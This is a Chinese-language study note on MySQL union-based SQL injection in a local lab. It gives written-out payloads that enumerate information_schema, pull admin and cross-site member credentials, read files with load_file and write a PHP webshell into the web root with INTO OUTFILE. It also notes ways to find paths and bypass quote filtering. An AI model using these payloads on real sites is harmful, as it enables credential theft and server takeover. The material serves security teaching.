1、统一交root用户管理#

• www.zblog.com = zblog = root =>MYSQL www.demo01.com = demo01 = root =>MYSQL

2、一对一用户管理（推荐)#

自己的网站单独创建数据库用户去管理自己的数据库

• www.zblog.com = zblog = zblog =>MYSQL www.demo01.com = demo01 = demo01 =>MYSQL

1.SQL注人的概念#

原理：接受的参数值未进行过滤直接带入SQL查询的操作 攻击：利用SQL语句执行你想要的东西（SQL语句能干嘛，注人就能干嘛） SQL语句能干嘛⇒SQL语句由谁决定⇒数据库类型决定〈为什么mysql注入。oracle注人叫法原因）

相关解释

获取相关数据： 1、数据库版本-看是否符合information_schema查询-version() 2、数据库用户-看是否符合ROOT型注入攻击-user() 3、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os 4、数据库名字-为后期猜解指定数据库下的表，列做准备-database()

MYSQL5.0以上版本：自带的数据库名information_schema

information_schema：存储数据库下的数据库名及表名，列名信息的数据库 information_schema.schemata：记录数据库名信息的表 information_schema.tables：记录表名信息的表 information_schema.columns：记录列名信息表 schema_name：information_schema.schemata记录数据库名信息的列名值 table_schema：information_schema.tables记录数据库名的列名值 table_name：information_schema.tables记录表名的列名值 column_name：information_schema.columns记录列名的列名值

2.SQL注人的流程：获取数据→一步一步得到信息

order by 6：这是一个排序语句，指示按照第6列进行排序。

​ 实战中，需要进行判断注入的列名有几个。

​ 有的话页面正常执行

​ 没有即会报错

​ 如：该表存在6列，输入7后会报错

union select 1,2,3,4,5,6：这是一个UNION查询，用于将多个SELECT语句的结果合并在一起。在这个例子中，它选择了6个列，每个SELECT语句都返回常量值。

发现执行后回显的数据：分别出现在网页署名（2），正标题（4），副标题（4），次标题（5） 如果没有回显数据，则在查询id加入负号即可http://127.0.0.1/new.php?id=-1 union select 1,2,3,4,5,6 查找回显的作用：可以判断后期注入查询返回的数据，可以在页面中显示出来；

union select 1,2,3,database(),user(),6：这个UNION查询选择了6个列，并在第4列返回数据库名称，第5列返回当前用户，其他列返回常量值。

union select 1,2,3,version(),@@version_compile_os,6：这个UNION查询选择了6个列，并在第4列返回数据库版本，第5列返回操作系统信息，其他列返回常量值。

返回数据库版本原因：MYSQL5.0以上版本：自带的数据库名information_schema（只有5.0以上的版本才可以实行下一步查询） 返回操作系统信息原因：如果是Linux系统对于后面的查询信息，大小写特定敏感

union select 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema=‘demo01’：这个UNION查询选择了6个列，并从information_schema.tables表中返回指定数据库（demo01）中的所有表名的组合字符串。

1. information_schema.tables表记录表名信息的表

2. table_schema：information_schema.tables记录**数据库名的列名值**

3. table_name：information_schema.tables记录**表名的列名值**

   

   

union select 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name=‘admin’：这个UNION查询选择了6个列，并从information_schema.columns表中返回指定表（admin）中的所有列名的组合字符串。

information_schema.columns 记录列名信息表

table_name：information_schema.tables记录**表名的列名值**

column_name：information_schema.columns记录列名的列名值

union select 1,2,3,username,password,6 from admin limit 0,1：这个UNION查询选择了6个列，并从admin表中返回第一行记录的用户名和密码。

1.SQL跨库查询：通过B网站的注入点获取A网站的账号和密码#

2.影响条件：当前数据库ROOT用户权限#

3.跨库查询顺序#

union select 1,2,3,4,group_concat(schema_name),6 from information_schema.schemata: 通过 information_schema.schemata 表获取所有数据库的名称，并将这些名称连接成一个字符串

union select 1,2,3,4,group_concat(table_name),6 from information_schema.tables where table_schema=‘zblog250817’: 通过 information_schema.tables 表获取 ‘zblog0817’ 数据库中所有表的名称，并将这些名称连接成一个字符串。

union select 1,2,3,4,group_concat(column_name),6 from information_schema.columns where table_name=‘zbp_member’ and table_schema=‘zblog250817’: 通过 information_schema.columns 表获取 ‘zblog250817’ 数据库中 ‘zbp_member’ 表的所有列名，并将这些列名连接成一个字符串。

union select 1,2,3,mem_Name,mem_Password,6 from zblog250817.zbp_member: 尝试从 ‘zblog250817’ 数据库的 ‘zbp_member’ 表中选择 mem_Name 和 mem_Password 列的数据，限制结果集为一个行。

4.注意事项

注意：由于是跨库操作，在此刻必须指明是哪个数据库的表名 from zblog250817.zbp_member: 不然会进行报错 表示 mysqli_query 返回的结果不是有效的 mysqli_result 对象，而是布尔值 false，可能是由于 SQL 查询执行失败

必须数据库权限是ROOT用户权限→才可以进行跨库

• 如下文件数据库配置则代表是最高权限ROOT用户权限

• 如果是其他数据库的权限
  • 只能看到该数据库用户下管理的表
• 无法执行跨库

1.影响条件：（必要条件）#

1. 当前数据库用户权限→必须是root用户

secure-file-priv设置→默认关闭，必须添加到MYsql的配置文件my.ini中

• D:\phpstudy_pro\Extensions\MySQL5.7.26**my.ini**

secure_file_priv 是 MySQL 数据库中的一个系统变量，用于限制使用 LOAD DATA INFILE 和 SELECT … INTO OUTFILE 语句时可以读取和写入的文件的路径。这个变量通常用于提高数据库的安全性，防止用户滥用这些语句导致的文件系统访问。

如果设置了这个变量，MySQL 将仅允许在指定的路径下进行文件的读取和写入操作。 如果没有设置，MySQL 将默认使用空值，表示禁用 LOAD DATA INFILE 和 SELECT … INTO OUTFILE。

例如，如果 secure_file_priv 被设置为 c:\，那么在执行 LOAD DATA INFILE 或 SELECT … INTO OUTFILE 时，只允许读写位于 c:\ 目录下的文件

2.进行测试

测试不同数据库用户：root demo

union select 1,load_file(‘d:\1.txt’),3,4,5,6这个部分尝试使用 MySQL 的 load_file 函数加载本地文件 ‘d:\1.txt’ 的内容，并将其作为查询结果的一部分返回。

union select 1,‘xiaodi’,3,4,5,6 into outfile ‘d:\3.txt’

• 将查询结果写入一个文件 ‘d:\3.txt’。
  • 这个查询也是一种尝试，试图将查询结果写入到指定的文件中。
  • 成功写入

union select 1,2,3,'',5,6 into outfile ‘D:\phpstudy_pro\WWW\demo_01\xiaodi.php’ 将木马文件写入网站源码目录，方便获取权限

****这是一个PHP代码片段，它使用eval()函数执行传递给$_POST[x]的代码。这段代码的含义是，它将执行$_POST[x]参数中包含的任意代码。 into outfile ‘D:\phpstudy_pro\WWW\demo_01\xiaodi.php’: 这是将木马文件写入网站源码目录，指定了写入的路径和文件名

3.读写的路径的问题：#

1、报错显示获取路径

2、phpinfo页面泄漏

如果不知道路径思路： 用常见的默认的中间件，数据库等安装路径读取有价值信息

load_file()常用路径：load_file()常用路径_load file 目录-CSDN博客

解决：单引号过滤绕过方式

sql注入中用单引号就不要编码，编码就不要用单引号（路径、表面、数据库名等）